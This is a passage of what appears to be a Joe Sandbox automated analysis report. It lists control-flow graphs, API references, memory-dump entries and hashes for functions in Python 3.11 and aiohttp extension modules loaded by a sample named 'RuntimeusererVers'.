                                                                                                                                                                                                                                          • Instruction ID: 73dc60ac93eaaa31b34e60680b41ae1dfd7efd0c1e748a41eb6ca50f95102a7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF510C25B28E1A92EB159B26EC5413A22A1FFA8FF0F404631EE5F47B94DF2CF4558740

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4701 7ff81eca27e0-7ff81eca2845 PyErr_GetExcInfo 4703 7ff81eca2993-7ff81eca2997 4701->4703 4704 7ff81eca284b-7ff81eca2874 PyErr_ExceptionMatches 4701->4704 4705 7ff81eca29a2-7ff81eca29ae PyErr_SetExcInfo 4703->4705 4706 7ff81eca2999-7ff81eca299c _Py_Dealloc 4703->4706 4707 7ff81eca28c3-7ff81eca28d8 PyErr_SetExcInfo 4704->4707 4708 7ff81eca2876-7ff81eca28a2 call 7ff81ecaf590 call 7ff81ecaeb20 4704->4708 4709 7ff81eca29b4-7ff81eca29d0 4705->4709 4706->4705 4711 7ff81eca28e9-7ff81eca28ec 4707->4711 4712 7ff81eca28da-7ff81eca28de 4707->4712 4728 7ff81eca2930-7ff81eca293f 4708->4728 4729 7ff81eca28a8-7ff81eca28bf 4708->4729 4715 7ff81eca29e1-7ff81eca29ea 4709->4715 4716 7ff81eca29d2-7ff81eca29d6 4709->4716 4713 7ff81eca28fd-7ff81eca2900 4711->4713 4714 7ff81eca28ee-7ff81eca28f2 4711->4714 4712->4711 4718 7ff81eca28e0-7ff81eca28e3 _Py_Dealloc 4712->4718 4720 7ff81eca2911-7ff81eca292b call 7ff81ecaf590 4713->4720 4721 7ff81eca2902-7ff81eca2906 4713->4721 4714->4713 4719 7ff81eca28f4-7ff81eca28f7 _Py_Dealloc 4714->4719 4716->4715 4722 7ff81eca29d8-7ff81eca29db _Py_Dealloc 4716->4722 4718->4711 4719->4713 4720->4709 4721->4720 4724 7ff81eca2908-7ff81eca290b _Py_Dealloc 4721->4724 4722->4715 4724->4720 4730 7ff81eca2941 _Py_Dealloc 4728->4730 4731 7ff81eca2947-7ff81eca2956 4728->4731 4729->4707 4730->4731 4732 7ff81eca2958 _Py_Dealloc 4731->4732 4733 7ff81eca295e-7ff81eca2962 4731->4733 4732->4733 4734 7ff81eca2964-7ff81eca2967 _Py_Dealloc 4733->4734 4735 7ff81eca296d-7ff81eca2975 4733->4735 4734->4735 4736 7ff81eca2977 _Py_Dealloc 4735->4736 4737 7ff81eca297d-7ff81eca2981 4735->4737 4736->4737 4738 7ff81eca2983-7ff81eca2986 _Py_Dealloc 4737->4738 4739 7ff81eca298c-7ff81eca2991 4737->4739 4738->4739 4739->4705
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyErr_GetExcInfo.PYTHON311 ref: 00007FF81ECA282F
                                                                                                                                                                                                                                          • PyErr_ExceptionMatches.PYTHON311 ref: 00007FF81ECA286C
                                                                                                                                                                                                                                          • PyErr_SetExcInfo.PYTHON311 ref: 00007FF81ECA28CF
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA28E3
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA28F7
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA290B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyThreadState_Get.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5B7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyErr_Fetch.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5E8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _PyObject_GetDictPtr.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5F5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyObject_Not.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF6C2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyErr_Restore.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF702
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyFrame_New.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF95D
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyTraceBack_Here.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF972
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF986
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF99A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAEB20: PyErr_Fetch.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB47
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAEB20: PyErr_NormalizeException.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB5C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAEB20: PyErr_Occurred.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB62
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAEB20: PyException_SetTraceback.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB83
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAEB20: PyErr_SetExcInfo.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEBDB
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2941
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2958
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2967
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2977
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2986
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA299C
                                                                                                                                                                                                                                          • PyErr_SetExcInfo.PYTHON311 ref: 00007FF81ECA29AE
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECA29DB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Info$ExceptionFetchObject_$Back_DictException_Frame_HereMatchesNormalizeOccurredRestoreState_ThreadTraceTraceback
                                                                                                                                                                                                                                          • String ID: aiohttp._http_parser.cb_on_message_complete
                                                                                                                                                                                                                                          • API String ID: 2151518968-1230838135
                                                                                                                                                                                                                                          • Opcode ID: bc54ca10f449a21608673cb3d55c93d6088ca25345fa2540dafe11702f722f75
                                                                                                                                                                                                                                          • Instruction ID: c3d4b7bac5b41cc64b4a37ec61ac8321ebfb08fd70e9e1b4dc569415c0af7a0c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc54ca10f449a21608673cb3d55c93d6088ca25345fa2540dafe11702f722f75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6510536A28F6285EB658F71EC441A967A4FB89FF8B080635EE4E13754DF3DE5858300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4740 7ff81ec81630-7ff81ec8165a 4741 7ff81ec8169f-7ff81ec816ad 4740->4741 4742 7ff81ec8165c-7ff81ec81669 PyObject_Size 4740->4742 4745 7ff81ec816af-7ff81ec816c1 call 7ff81ec82530 4741->4745 4746 7ff81ec816e3-7ff81ec816f1 4741->4746 4743 7ff81ec8166b-7ff81ec81674 4742->4743 4744 7ff81ec81679-7ff81ec8167d 4742->4744 4749 7ff81ec817d9-7ff81ec817ee call 7ff81ec82840 4743->4749 4744->4741 4750 7ff81ec8167f-7ff81ec8169a PyErr_SetNone 4744->4750 4757 7ff81ec816c3-7ff81ec816cc 4745->4757 4758 7ff81ec816d1-7ff81ec816db 4745->4758 4747 7ff81ec8172d-7ff81ec81736 4746->4747 4748 7ff81ec816f3-7ff81ec816fb PyType_IsSubtype 4746->4748 4754 7ff81ec81738 4747->4754 4755 7ff81ec81741-7ff81ec81751 PyObject_Size 4747->4755 4748->4747 4752 7ff81ec816fd-7ff81ec8170f call 7ff81ec82530 4748->4752 4768 7ff81ec8188a-7ff81ec81892 4749->4768 4750->4749 4774 7ff81ec8171f-7ff81ec81729 4752->4774 4775 7ff81ec81711-7ff81ec8171a 4752->4775 4761 7ff81ec8173b _Py_Dealloc 4754->4761 4762 7ff81ec8175e-7ff81ec81769 4755->4762 4763 7ff81ec81753-7ff81ec8175c 4755->4763 4757->4749 4758->4746 4766 7ff81ec816dd _Py_Dealloc 4758->4766 4761->4755 4764 7ff81ec8176b-7ff81ec81772 4762->4764 4765 7ff81ec817a3-7ff81ec817b2 PyByteArray_AsString 4762->4765 4763->4749 4764->4765 4769 7ff81ec81774-7ff81ec817a1 PyErr_Format 4764->4769 4770 7ff81ec817bf-7ff81ec817ce PyBytes_AsString 4765->4770 4771 7ff81ec817b4-7ff81ec817bd 4765->4771 4766->4746 4772 7ff81ec818a4-7ff81ec818ac 4768->4772 4773 7ff81ec81894-7ff81ec81899 4768->4773 4769->4749 4776 7ff81ec817f3-7ff81ec81804 4770->4776 4777 7ff81ec817d0-7ff81ec817d5 4770->4777 4771->4749 4779 7ff81ec818ae-7ff81ec818b2 4772->4779 4780 7ff81ec818bd-7ff81ec818ca 4772->4780 4773->4772 4778 7ff81ec8189b-7ff81ec8189e _Py_Dealloc 4773->4778 4774->4755 4781 7ff81ec8172b 4774->4781 4775->4749 4783 7ff81ec8182d-7ff81ec81831 4776->4783 4784 7ff81ec81806-7ff81ec81818 4776->4784 4777->4749 4778->4772 4779->4780 4782 7ff81ec818b4-7ff81ec818b7 _Py_Dealloc 4779->4782 4781->4761 4782->4780 4786 7ff81ec8185d-7ff81ec81860 4783->4786 4787 7ff81ec81833-7ff81ec81848 4783->4787 4785 7ff81ec81820-7ff81ec8182b 4784->4785 4785->4783 4785->4785 4788 7ff81ec81862-7ff81ec81865 4786->4788 4789 7ff81ec81880-7ff81ec81887 4786->4789 4790 7ff81ec81850-7ff81ec8185b 4787->4790 4791 7ff81ec81870-7ff81ec8187e 4788->4791 4789->4768 4790->4786 4790->4790 4791->4789 4791->4791
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_NoneObject_Size
                                                                                                                                                                                                                                          • String ID: Expected %.16s, got %.200s$aiohttp._websocket._websocket_mask_cython$bytearray
                                                                                                                                                                                                                                          • API String ID: 2431445522-216305604
                                                                                                                                                                                                                                          • Opcode ID: 404dfbd97eb19e2a84dec710d42d2d46cdfe778bffa8fadc5a1f285570af02a4
                                                                                                                                                                                                                                          • Instruction ID: 80aba86c4fcb65ec25fd9f3546fdad6cf9d94a3ce2ce81f73db53068261aa842
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 404dfbd97eb19e2a84dec710d42d2d46cdfe778bffa8fadc5a1f285570af02a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D716B35E28E4685EB148B22EE40A7963E1FB95BF4F55433ACA5E07B94DF2CF4458700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyType_IsSubtype.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC8255A
                                                                                                                                                                                                                                          • Py_EnterRecursiveCall.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC8258D
                                                                                                                                                                                                                                          • Py_LeaveRecursiveCall.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825A3
                                                                                                                                                                                                                                          • PyErr_Occurred.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825AE
                                                                                                                                                                                                                                          • PyErr_SetString.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825CA
                                                                                                                                                                                                                                          • PyTuple_New.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825DF
                                                                                                                                                                                                                                          • PyObject_Call.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC82615
                                                                                                                                                                                                                                          • Py_EnterRecursiveCall.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC82627
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC82679
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Call$Recursive$EnterErr_$DeallocLeaveObject_OccurredStringSubtypeTuple_Type_
                                                                                                                                                                                                                                          • String ID: while calling a Python object$NULL result without error in PyObject_Call
                                                                                                                                                                                                                                          • API String ID: 1205730747-1256585865
                                                                                                                                                                                                                                          • Opcode ID: c948033a7b3defe542d8b49b9e81706fc244dce4e2484c539aedf2ec7ab28b5f
                                                                                                                                                                                                                                          • Instruction ID: b19f2b36b071fd319f1dd63e69af3e9f4049b41b556945c3dac5bd9df731b92a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c948033a7b3defe542d8b49b9e81706fc244dce4e2484c539aedf2ec7ab28b5f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE410C21A28E4686EB589F12EE58A39A3A1FF55FE5F084239DE4D47764EF3CF4458300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4816 7ff81ecaffc0-7ff81ecb0000 4817 7ff81ecb0002-7ff81ecb0005 4816->4817 4818 7ff81ecb001f-7ff81ecb0027 4816->4818 4819 7ff81ecb0011-7ff81ecb001a PyObject_GetAttr 4817->4819 4820 7ff81ecb0007-7ff81ecb000c 4817->4820 4821 7ff81ecb003a-7ff81ecb004c _PyType_Lookup 4818->4821 4822 7ff81ecb0029-7ff81ecb0034 PyType_Ready 4818->4822 4823 7ff81ecb011d-7ff81ecb0120 4819->4823 4820->4823 4825 7ff81ecb008a-7ff81ecb0096 _PyObject_GetDictPtr 4821->4825 4826 7ff81ecb004e-7ff81ecb005c 4821->4826 4822->4821 4824 7ff81ecb0183 4822->4824 4827 7ff81ecb0122-7ff81ecb012d 4823->4827 4828 7ff81ecb0155-7ff81ecb0158 4823->4828 4832 7ff81ecb0185-7ff81ecb01a1 4824->4832 4829 7ff81ecb00f2-7ff81ecb00f7 4825->4829 4830 7ff81ecb0098-7ff81ecb009e 4825->4830 4833 7ff81ecb0082 4826->4833 4834 7ff81ecb005e-7ff81ecb0065 4826->4834 4827->4828 4835 7ff81ecb012f-7ff81ecb0133 4827->4835 4828->4824 4837 7ff81ecb014b-7ff81ecb0153 4829->4837 4838 7ff81ecb00f9-7ff81ecb00fc 4829->4838 4830->4829 4836 7ff81ecb00a0-7ff81ecb00b9 _PyDict_GetItem_KnownHash 4830->4836 4833->4825 4834->4833 4839 7ff81ecb0067-7ff81ecb0071 4834->4839 4835->4828 4841 7ff81ecb0135-7ff81ecb0140 4835->4841 4842 7ff81ecb00e3-7ff81ecb00e7 4836->4842 4843 7ff81ecb00bb-7ff81ecb00c2 4836->4843 4837->4832 4844 7ff81ecb015a-7ff81ecb015d 4838->4844 4845 7ff81ecb00fe-7ff81ecb0112 4838->4845 4839->4825 4840 7ff81ecb0073-7ff81ecb007e PyDescr_IsData 4839->4840 4840->4825 4846 7ff81ecb0080 4840->4846 4841->4837 4847 7ff81ecb0142-7ff81ecb0145 _Py_Dealloc 4841->4847 4842->4829 4852 7ff81ecb00e9-7ff81ecb00ec _Py_Dealloc 4842->4852 4848 7ff81ecb00c4-7ff81ecb00c7 _Py_Dealloc 4843->4848 4849 7ff81ecb00cd-7ff81ecb00d0 4843->4849 4850 7ff81ecb0164-7ff81ecb017d PyErr_Format 4844->4850 4851 7ff81ecb015f-7ff81ecb0162 4844->4851 4845->4823 4855 7ff81ecb0114-7ff81ecb0117 _Py_Dealloc 4845->4855 4846->4845 4847->4837 4848->4849 4849->4827 4854 7ff81ecb00d2-7ff81ecb00d6 4849->4854 4850->4824 4851->4824 4852->4829 4854->4827 4856 7ff81ecb00d8-7ff81ecb00e1 _Py_Dealloc 4854->4856 4855->4823 4856->4827
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocType_$AttrDataDescr_Err_FormatLookupObject_Ready
                                                                                                                                                                                                                                          • String ID: '%.50s' object has no attribute '%U'
                                                                                                                                                                                                                                          • API String ID: 2113936552-1665026449
                                                                                                                                                                                                                                          • Opcode ID: 65b72670b124d071fe0bb91acee10904893d0bafab8c134f6fbfd363caa8fa40
                                                                                                                                                                                                                                          • Instruction ID: 4da1ff2c09130b2cae437960f4a86ed2f80a3192a54c460efdca1912090a7a5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b72670b124d071fe0bb91acee10904893d0bafab8c134f6fbfd363caa8fa40
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67511322E29E42C1EB698F12AD4927963A5FB44BE4F084731EE5E17760DF7CF6818700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4857 7ff81df30010-7ff81df3002c 4858 7ff81df303c8 4857->4858 4859 7ff81df30032-7ff81df30045 EnterCriticalSection 4857->4859 4862 7ff81df303cf-7ff81df303e2 4858->4862 4860 7ff81df30060-7ff81df30084 4859->4860 4861 7ff81df30047-7ff81df3004a 4859->4861 4865 7ff81df3009f-7ff81df300aa calloc 4860->4865 4866 7ff81df30086-7ff81df3009d memset 4860->4866 4863 7ff81df3004c-7ff81df30050 4861->4863 4864 7ff81df30055-7ff81df3005b 4861->4864 4867 7ff81df30151-7ff81df3016f WakeAllConditionVariable LeaveCriticalSection 4863->4867 4864->4867 4868 7ff81df300ad-7ff81df300b0 4865->4868 4866->4868 4867->4858 4869 7ff81df30175-7ff81df30184 4867->4869 4870 7ff81df300bb-7ff81df300e9 memmove 4868->4870 4871 7ff81df300b2-7ff81df300b6 4868->4871 4873 7ff81df3018a-7ff81df301ab 4869->4873 4874 7ff81df302ae-7ff81df302c6 call 7ff81df2e670 4869->4874 4876 7ff81df300eb-7ff81df300f3 4870->4876 4877 7ff81df30107-7ff81df30112 4870->4877 4875 7ff81df30149 4871->4875 4878 7ff81df301fa-7ff81df30238 4873->4878 4879 7ff81df301ad-7ff81df301af 4873->4879 4874->4858 4896 7ff81df302cc-7ff81df302d3 4874->4896 4875->4867 4880 7ff81df30101 free 4876->4880 4881 7ff81df300f5-7ff81df300ff 4876->4881 4883 7ff81df3013f-7ff81df30145 4877->4883 4884 7ff81df30114-7ff81df30118 4877->4884 4889 7ff81df3023a-7ff81df30251 memset 4878->4889 4890 7ff81df30253-7ff81df3025e calloc 4878->4890 4885 7ff81df301cd-7ff81df301d5 4879->4885 4886 7ff81df301b1-7ff81df301b5 4879->4886 4880->4877 4881->4877 4883->4875 4888 7ff81df30120-7ff81df3012d call 7ff81dee2390 4884->4888 4894 7ff81df301f1-7ff81df301f4 free 4885->4894 4895 7ff81df301d7-7ff81df301e1 4885->4895 4892 7ff81df301b7-7ff81df301cb DeleteCriticalSection 4886->4892 4909 7ff81df301e3-7ff81df301ec 4888->4909 4910 7ff81df30133-7ff81df3013d 4888->4910 4891 7ff81df30261-7ff81df30264 4889->4891 4890->4891 4898 7ff81df3026f-7ff81df30272 4891->4898 4899 7ff81df30266-7ff81df3026a 4891->4899 4892->4885 4892->4892 4894->4878 4895->4878 4900 7ff81df302de-7ff81df302e2 4896->4900 4901 7ff81df302d5-7ff81df302d9 4896->4901 4904 7ff81df302a0-7ff81df302a8 4898->4904 4905 7ff81df30274-7ff81df30278 4898->4905 4899->4858 4907 7ff81df302ea-7ff81df3032d call 7ff81df2e8e0 call 7ff81df2e960 4900->4907 4908 7ff81df302e4-7ff81df302e8 4900->4908 4901->4858 4904->4874 4911 7ff81df30280-7ff81df3029e InitializeCriticalSection InitializeConditionVariable 4905->4911 4907->4858 4912 7ff81df30333-7ff81df3033a 4907->4912 4908->4912 4909->4875 4910->4883 4910->4888 4911->4904 4911->4911 4914 7ff81df303c0 4912->4914 4915 7ff81df30340-7ff81df30344 4912->4915 4914->4858 4918 7ff81df30346-7ff81df3038f call 7ff81df2e500 call 7ff81df2e450 4915->4918 4919 7ff81df303a7-7ff81df303be call 7ff81deeacb0 4915->4919 4918->4914 4927 7ff81df30391-7ff81df303a1 EnterCriticalSection LeaveCriticalSection 4918->4927 4919->4862 4927->4919
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$ConditionEnterInitializeLeaveVariablememset$DeleteWakecallocfree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4204190911-0
                                                                                                                                                                                                                                          • Opcode ID: 786c678dbf9e1a74e6e73d2035b61a2c857e4ab1ae038d387392f9073acad0f2
                                                                                                                                                                                                                                          • Instruction ID: 6cdcb9909e6ea436b6b717289a262f9768bdb150f5992b22c72f2f84abd786e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 786c678dbf9e1a74e6e73d2035b61a2c857e4ab1ae038d387392f9073acad0f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFB16023A08E5696EB659F25A4103AA6360FF48BE8F195335DE8F06654EF3CE681C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
